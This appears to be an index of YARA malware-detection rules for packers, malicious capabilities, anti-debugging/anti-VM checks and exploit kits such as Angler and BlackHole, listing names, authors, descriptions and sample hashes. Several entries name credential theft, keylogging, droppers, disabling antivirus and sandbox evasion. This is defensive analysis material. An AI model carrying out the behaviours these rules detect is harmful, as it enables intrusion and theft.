packers_index PrivateEXEProtector197SetiSoft author: malware-lu
packers_index FSGv20 author: malware-lu
packers_index SimplePack1XMethod2bagie author: malware-lu
packers_index FishPEShield112116HellFish author: malware-lu
packers_index PrivateexeProtector20SetiSoftTeam author: malware-lu
packers_index PEBundlev310 author: malware-lu
packers_index PECompactv2xx author: malware-lu
packers_index Armadillo440SiliconRealmsToolworks author: malware-lu
packers_index EXEStealth276UnregisteredWebtoolMaster author: malware-lu
packers_index ABCCryptor10byZloY author: malware-lu
packers_index RLPackV112V114aPlib043ap0x author: malware-lu
packers_index Crypter31SLESH author: malware-lu
packers_index FreeCryptor02build002GlOFF author: malware-lu
packers_index PackItBitchV10archphase author: malware-lu
packers_index NullsoftInstallSystemv20b4 author: malware-lu
packers_index BeRoEXEPackerV100BeRo author: malware-lu
packers_index VIRUSIWormHybris author: malware-lu
packers_index GPInstallv50332 author: malware-lu
packers_index VIRUSIWormBagle author: malware-lu
packers_index UnnamedScrambler20p0ke author: malware-lu
packers_index NsPackv31NorthStar author: malware-lu
packers_index HyingsPEArmor075exeHyingCCG author: malware-lu
packers_index SimplePack121build0909Method2bagie author: malware-lu
packers_index UnnamedScrambler12C12Dp0ke author: malware-lu
packers_index AlexProtectorv04beta1byAlex author: malware-lu
packers_index FishPEShield101HellFish author: malware-lu
packers_index PrivateexeProtector21522XSetiSoftTeam author: malware-lu
packers_index PiCryptor10byScofield author: malware-lu
packers_index PEArmor07600765hying author: malware-lu
packers_index VBOXv43v46 author: malware-lu
packers_index ARMProtectorv01bySMoKE author: malware-lu
packers_index NullsoftInstallSystemv20a0 author: malware-lu
packers_index D1S1Gv11betaD1N author: malware-lu
packers_index INCrypter03INinYbyz3e_NiFe author: malware-lu
packers_index MorphineV27Holy_FatherRatter29A author: malware-lu
packers_index nBinderv361 author: malware-lu
packers_index MatrixDongleTDiGmbH author: malware-lu
packers_index NullsoftInstallSystemv20RC2 author: malware-lu
packers_index MSLRHv01emadicius author: malware-lu
packers_index VProtector11A12vcasm author: malware-lu
packers_index codeCrypter031 author: malware-lu
packers_index RLPackFullEditionV11Xap0x author: malware-lu
packers_index Escargot01byueMeat author: malware-lu
packers_index ACProtectv135riscosoftwareIncAnticrackSoftware author: malware-lu
packers_index winrar_sfx author: Kevin Falcoz date_create: 18/03/2013 description: Winrar SFX Archive
packers_index mpress_2_xx_net author: Kevin Falcoz date_create: 24/03/2013 description: MPRESS v2.XX .NET
packers_index rpx_1_xx author: Kevin Falcoz date_create: 24/03/2013 description: RPX v1.XX
packers_index dotfuscator author: Jean-Philippe Teissier / @Jipe_ description: Dotfuscator date: 2013-02-01 filetype: memory version: 1.0
packers_index AutoIt_2 author: Jean-Philippe Teissier / @Jipe_ description: AutoIT packer date: 2013-02-01 filetype: memory version: 1.0
packers_index IsPE64
packers_index IsWindowsGUI
packers_index HasTaggantSignature author: _pusher_ description: TaggantSignature Check date: 2016-07
packers_index HasRichSignature author: _pusher_ description: Rich Signature Check date: 2016-07
packers_index free_pascal author: _pusher_ description: Free Pascal date: 2015-08 version: 0.1
packers_index borland_delphi_dll author: _pusher_ description: Borland Delphi DLL date: 2015-08 version: 0.1 info: one is at entrypoint
packers_index AutoIt author: _pusher_ date: 2016-07 description: www.autoitscript.com/site/autoit/
packers_index Microsoft_Visual_Cpp_V80_Debug
packers_index Microsoft_Visual_Cpp_80_Debug_
packers_index Microsoft_Visual_Cpp_80_Debug
capabilities_index inject_thread author: x0r description: Code injection with CreateRemoteThread in a remote process version: 0.1
capabilities_index create_service author: x0r description: Create a windows service version: 0.2
capabilities_index create_com_service author: x0r description: Create a COM server version: 0.1
capabilities_index network_udp_sock author: x0r description: Communications over UDP network version: 0.1
capabilities_index network_tcp_listen author: x0r description: Listen for incoming communication version: 0.1
capabilities_index network_dyndns author: x0r description: Communications dyndns network version: 0.1
capabilities_index network_smtp_dotNet author: x0r description: Communications smtp version: 0.1
capabilities_index network_smtp_raw author: x0r description: Communications smtp version: 0.1
capabilities_index network_smtp_vb author: x0r description: Communications smtp version: 0.1
capabilities_index network_p2p_win author: x0r description: Communications over P2P network version: 0.1
capabilities_index network_irc author: x0r description: Communications over IRC network version: 0.1
capabilities_index network_http author: x0r description: Communications over HTTP version: 0.1
capabilities_index network_dropper author: x0r description: File downloader/dropper version: 0.1
capabilities_index network_ftp author: x0r description: Communications over FTP version: 0.1
capabilities_index network_tcp_socket author: x0r description: Communications over RAW socket version: 0.1
capabilities_index network_dns author: x0r description: Communications use DNS version: 0.1
capabilities_index network_ssl author: x0r description: Communications over SSL version: 0.1
capabilities_index network_dga author: x0r description: Communication using dga version: 0.1
capabilities_index bitcoin author: x0r description: Perform crypto currency mining version: 0.1
capabilities_index escalate_priv author: x0r description: Escalade priviledges version: 0.1
capabilities_index screenshot author: x0r description: Take screenshot version: 0.1
capabilities_index lookupip author: x0r description: Lookup external IP version: 0.1
capabilities_index lookupgeo author: x0r description: Lookup Geolocation version: 0.1
capabilities_index keylogger author: x0r description: Run a keylogger version: 0.1
capabilities_index cred_local author: x0r description: Steal credential version: 0.1
capabilities_index sniff_audio author: x0r description: Record Audio version: 0.1
capabilities_index cred_ff author: x0r description: Steal Firefox credential version: 0.1
capabilities_index cred_vnc author: x0r description: Steal VNC credential version: 0.1
capabilities_index cred_ie7 author: x0r description: Steal IE 7 credential version: 0.1
capabilities_index sniff_lan author: x0r description: Sniff Lan network traffic version: 0.1
capabilities_index migrate_apc author: x0r description: APC queue tasks migration version: 0.1
capabilities_index spreading_file author: x0r description: Malware can spread east-west file version: 0.1
capabilities_index spreading_share author: x0r description: Malware can spread east-west using share drive version: 0.1
capabilities_index rat_vnc author: x0r description: Remote Administration toolkit VNC version: 0.1
capabilities_index rat_rdp author: x0r description: Remote Administration toolkit enable RDP version: 0.1
capabilities_index rat_webcam author: x0r description: Remote Administration toolkit using webcam version: 0.1
capabilities_index win_mutex author: x0r description: Create or check mutex version: 0.1
capabilities_index win_registry author: x0r description: Affect system registries version: 0.1
capabilities_index win_token author: x0r description: Affect system token version: 0.1
capabilities_index win_private_profile author: x0r description: Affect private profile version: 0.1
capabilities_index win_files_operation author: x0r description: Affect private profile version: 0.1
capabilities_index Str_Win32_Winsock2_Library author: @adricnet description: Match Winsock 2 API library declaration method: String match reference: https://github.com/dfirnotes/rules
capabilities_index Str_Win32_Wininet_Library author: @adricnet description: Match Windows Inet API library declaration method: String match reference: https://github.com/dfirnotes/rules
capabilities_index Str_Win32_Internet_API author: @adricnet description: Match Windows Inet API call method: String match, trim the As reference: https://github.com/dfirnotes/rules
capabilities_index Str_Win32_Http_API author: @adricnet description: Match Windows Http API call method: String match, trim the As reference: https://github.com/dfirnotes/rules
capabilities_index ldpreload author: xorseed reference: https://stuff.rop.io/
antidebug_antivm_index DebuggerCheck__PEB weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__GlobalFlags weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__QueryInfo weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__RemoteAPI weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerHiding__Thread Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara weight: 1
antidebug_antivm_index DebuggerHiding__Active weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerException__ConsoleCtrl weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerException__SetConsoleCtrl weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index ThreadControl__Context weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index DebuggerCheck__DrWatson weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__v3 weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__v4 weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__vba weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH__vectored weight: 1 Author: naxonez reference: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH_Save author: Malware Utkonos original_author: naxonez source: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index SEH_Init author: Malware Utkonos original_author: naxonez source: https://github.com/naxonez/yaraRules/blob/master/AntiDebugging.yara
antidebug_antivm_index Check_Wine Author: Nick Hoffman Description: Checks for the existence of Wine Sample: de1af0e97e94859d372be7fcf3a5daa5
antidebug_antivm_index vmdetect author: nex description: Possibly employs anti-virtualization techniques
antidebug_antivm_index Check_FilePaths Author: Nick Hoffman Description: Checks for filepaths containing popular sandbox names Sample: de1af0e97e94859d372be7fcf3a5daa5
antidebug_antivm_index Check_OutputDebugStringA_iat Author: http://twitter.com/j0sm1 Description: Detect in IAT OutputDebugstringA Date: 20/04/2015
antidebug_antivm_index WMI_VM_Detect version: 2 threat: Using WMI to detect virtual machines via querying video card information behaviour_class: Evasion author: Joe Giron date: 2015-09-25 description: Detection of Virtual Appliances through the use of WMI for use of evasion.
antidebug_antivm_index anti_dbg author: x0r description: Checks if being debugged version: 0.2
antidebug_antivm_index anti_dbgtools author: x0r description: Checks for the presence of known debug tools version: 0.1
antidebug_antivm_index antisb_threatExpert author: x0r description: Anti-Sandbox checks for ThreatExpert version: 0.1
antidebug_antivm_index antisb_sandboxie author: x0r description: Anti-Sandbox checks for Sandboxie version: 0.1
antidebug_antivm_index antivm_virtualbox author: x0r description: AntiVM checks for VirtualBox version: 0.1
antidebug_antivm_index antivm_vmware author: x0r description: AntiVM checks for VMWare version: 0.1
antidebug_antivm_index disable_antivirus author: x0r description: Disable AntiVirus version: 0.2
antidebug_antivm_index disable_firewall author: x0r description: Disable Firewall version: 0.1
antidebug_antivm_index disable_dep author: x0r description: Bypass DEP version: 0.1
antidebug_antivm_index win_hook author: x0r description: Affect hook table version: 0.1
antidebug_antivm_index vmdetect_misc author: @abhinavbom maltype: NA version: 0.1 date: 31/10/2015 description: Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.
exploit_kits_index angler_flash author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 8081397c30b53119716c374dd58fc653 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash2 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 23812c5a1d33c9ce61b0882f860d79d6 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash4 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: dbb3f5e90c05602d92e5d6e12f8c1421 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash5 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 9f809272e59ee9ecd71093035b31eec6 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_flash_uncompressed author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 2543855d992b2f9a576f974c2630d851 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_html author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: afca949ab09c5583a2ea5b2006236666 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_html2 author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 6c926bf25d1a8a80ab988c8a34c0102e sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index angler_js author: Josh Berry date: 2016-06-26 description: Angler Exploit Kit Detection hash0: 482d6c24a824103f0bcd37fa59e19452 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_jar author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 86946ec2d2031f2b456e804cac4ade6d sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_jar2 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: add1d01ba06d08818ff6880de2ee74e8 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_jar3 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: c7abd2142f121bd64e55f145d4b860fa sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_pdf author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: d1e2ff36a6c882b289d3b736d915a6cc sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole1_jar author: Josh Berry date: 2016-06-26 description: BlackHole1 Exploit Kit Detection hash0: 724acccdcf01cf2323aa095e6ce59cae sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 92e21e491a90e24083449fd906515684 hash1: 98b302a504a7ad0e3515ab6b96d623f9 hash2: a91d885ef4c4a0d16c88b956db9c6f43 hash3: d8336f7ae9b3a4db69317aea105f49be hash4: eba5daf0442dff5b249274c99552177b hash5: 02d8e6daef5a4723621c25cfb766a23d hash6: dadf69ce2124283a59107708ffa9c900 hash7: 467199178ac940ca311896c7d116954f hash8: 17ab5b85f2e1f2b5da436555ea94f859 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm10 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 83704d531c9826727016fec285675eb1 hash1: 103ef0314607d28b3c54cd07e954cb25 hash2: 16c002dc45976caae259d7cabc95b2c3 hash3: fd84d695ac3f2ebfb98d3255b3a4e1de hash4: c7b417a4d650c72efebc2c45eefbac2a hash5: c3c35e465e316a71abccca296ff6cd22 hash7: 10ce7956266bfd98fe310d7568bfc9d0 hash8: 60024caf40f4239d7e796916fb52dc8c sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm11 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: e89b56df597688c489f06a0a6dd9efed hash1: 06ba331ac5ae3cd1986c82cb1098029e hash2: a899dedb50ad81d9dbba660747828c7b hash3: 7cbb58412554327fe8b643204a046e2b hash7: 530d31a0c45b79c1ee0c5c678e242c02 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm12 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 0d3acb5285cfe071e30be051d2aaf28a hash1: 6f27377115ba5fd59f007d2cb3f50b35 hash2: f7ffe1fd1a57d337a04d3c777cddc065 hash3: 06997228f2769859ef5e4cd8a454d650 hash4: 11062eea9b7f2a2675c1e60047e8735c hash7: 4ec720cfafabd1c9b1034bb82d368a30 hash8: ecd7d11dc9bb6ee842e2a2dce56edc6f sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm3 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 018ef031bc68484587eafeefa66c7082 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm4 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 926429bf5fe1fbd531eb100fc6e53524 hash1: 7b6cdc67077fc3ca75a54dea0833afe3 hash2: 82f108d4e6f997f8fc4cc02aad02629a hash3: bd819c3714dffb5d4988d2f19d571918 hash4: 9bc9f925f60bd8a7b632ae3a6147cb9e hash7: 386cb76d46b281778c8c54ac001d72dc hash8: 0d95c666ea5d5c28fca5381bd54304b3 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm5 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: fccb8f71663620a5a8b53dcfb396cfb5 hash1: a09bcf1a1bdabe4e6e7e52e7f8898012 hash2: 40db66bf212dd953a169752ba9349c6a hash3: 25a87e6da4baa57a9d6a2cdcb2d43249 hash4: 6f4c64a1293c03c9f881a4ef4e1491b3 hash7: 4bdfff8de0bb5ea2d623333a4a82c7f9 hash8: b43b6a1897c2956c2a0c9407b74c4232 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm6 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: a5f94d7bdeb88b57be67132473e48286 hash1: 2e72a317d07aa1603f8d138787a2c582 hash2: 9440d49e1ed0794c90547758ef6023f7 hash3: 58265fc893ed5a001e3a7c925441298c hash7: 95c6462d0f21181c5003e2a74c8d3529 hash8: 9236e7f96207253b4684f3497bcd2b3d sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index blackhole2_htm8 author: Josh Berry date: 2016-06-27 description: BlackHole2 Exploit Kit Detection hash0: 3f47452c1e40f68160beff4bb2a3e5f4 hash1: 1e2ba0176787088e3580dfce0245bc16 hash2: 1c78d96bb8d8f8a71294bc1e6d374b0f hash3: f5e16a6cd2c2ac71289aaf1c087224ee hash7: 6702efdee17e0cd6c29349978961d9fa hash8: 287dca9469c8f7f0cb6e5bdd9e2055cd sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_adobe_2010_1297_exploit author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: 8179a7f91965731daa16722bd95f0fcf sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_adobe_2010_2884_exploit author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: b22ac6bea520181947e7855cd317c9ac sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_jar2 author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: 2bc0619f9a0c483f3fd6bce88148a7ab sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index bleedinglife2_java_2010_0842_exploit author: Josh Berry date: 2016-06-26 description: BleedingLife2 Exploit Kit Detection hash0: b14ee91a3da82f5acc78abd10078752e sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index crimepack_jar author: Josh Berry date: 2016-06-26 description: CrimePack Exploit Kit Detection hash0: d48e70d538225bc1807842ac13a8e188 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index crimepack_jar3 author: Josh Berry date: 2016-06-26 description: CrimePack Exploit Kit Detection hash0: 40ed977adc009e1593afcb09d70888c4 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_jar author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: ad829f4315edf9c2611509f3720635d2 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_jar2 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 94e99de80c357d01e64abf7dc5bd0ebd sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_jar3 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: f65f3b9b809ebf221e73502480ab6ea7 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_js author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 08f8488f1122f2388a0fd65976b9becd sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_js2 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 2f5ace22e886972a8dccc6aa5deb1e79 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index eleonore_js3 author: Josh Berry date: 2016-06-26 description: Eleonore Exploit Kit Detection hash0: 9dcb8cd8d4f418324f83d914ab4d4650 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_htm author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: f76deec07a61b4276acc22beef41ea47 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: f234c11b5da9a782cb1e554f520a66cf sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js2 author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: f234c11b5da9a782cb1e554f520a66cf sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_flash author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 377431417b34de8592afecaea9aab95d sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_java author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 7398e435e68a2fa31607518befef30fb sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_quicktime author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 6bfc7bb877e1a79be24bd9563c768ffd sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index fragus_js_vml author: Josh Berry date: 2016-06-26 description: Fragus Exploit Kit Detection hash0: 8ab72337c815e0505fcfbc97686c3562 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 8395f08f1371eb7b2a2e131b92037f9a sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html10 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: f5f8dceca74a50076070f2593e82ec43 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html11 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: be8c81288f9650e205ed13f3167ce256 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html2 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 2fd263f5d988a92715f4146a0006cb31 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html3 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: d7cacbff6438d866998fc8bfee18102d sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html4 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 61fde003211ac83c2884fbecefe1fc80 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html5 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 30afdca94d301905819e00a7458f4a4e sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html6 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 4aabb710cf04240d26c13dd2b0ccd6cc sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html7 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: f0e1b391ec3ce515fd617648bec11681 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html8 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 1c19a863fc4f8b13c0c7eb5e231bc3d1 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_html9 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 742d012b9df0c27ed6ccf3b234db20db sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_jar author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: a8a18219b02d30f44799415ff19c518e sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_jar2 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 989c5b5eaddf48010e62343d7a4db6f4 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_jar3 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: c5655c496949f8071e41ea9ac011cab2 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_pdf author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 16de68e66cab08d642a669bf377368da hash1: bab281fe0cf3a16a396550b15d9167d5 sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_pdf2 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: 33cb6c67f58609aa853e80f718ab106a sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index phoenix_pdf3 author: Josh Berry date: 2016-06-26 description: Phoenix Exploit Kit Detection hash0: bab281fe0cf3a16a396550b15d9167d5 sample_filetype: pdf yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index sakura_jar author: Josh Berry date: 2016-06-26 description: Sakura Exploit Kit Detection hash0: a566ba2e3f260c90e01366e8b0d724eb sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index sakura_jar2 author: Josh Berry date: 2016-06-26 description: Sakura Exploit Kit Detection hash0: d21b4e2056e5ef9f9432302f445bcbe1 sample_filetype: unknown yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_css author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 4944324bad3b020618444ee131dce3d0 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_css2 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: e300d6a36b9bfc3389f64021e78b1503 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_htm author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 0e7d72749b60c8f05d4ff40da7e0e937 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: a9f30483a197cfdc65b4a70b8eb738ab sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js2 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: b5fda04856b98c254d33548cc1c1216c sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js3 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 5f13fdfb53a3e60e93d7d1d7bbecff4f sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeroaccess_js4 author: Josh Berry date: 2016-06-27 description: ZeroAccess Exploit Kit Detection hash0: 268ae96254e423e9d670ebe172d1a444 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zerox88_js2 author: Josh Berry date: 2016-06-26 description: 0x88 Exploit Kit Detection hash0: cad8b652338f5e3bc93069c8aa329301 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zerox88_js3 author: Josh Berry date: 2016-06-26 description: 0x88 Exploit Kit Detection hash0: 9df0ac2fa92e602ec11bac53555e2d82 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
exploit_kits_index zeus_js author: Josh Berry date: 2016-06-26 description: Zeus Exploit Kit Detection hash0: c87ac7a25168df49a64564afb04dc961 sample_filetype: js-html yaragenerator: https://github.com/Xen0ph0n/YaraGenerator
crypto_index Big_Numbers0 author: _pusher_ description: Looks for big numbers 20:sized date: 2016-07
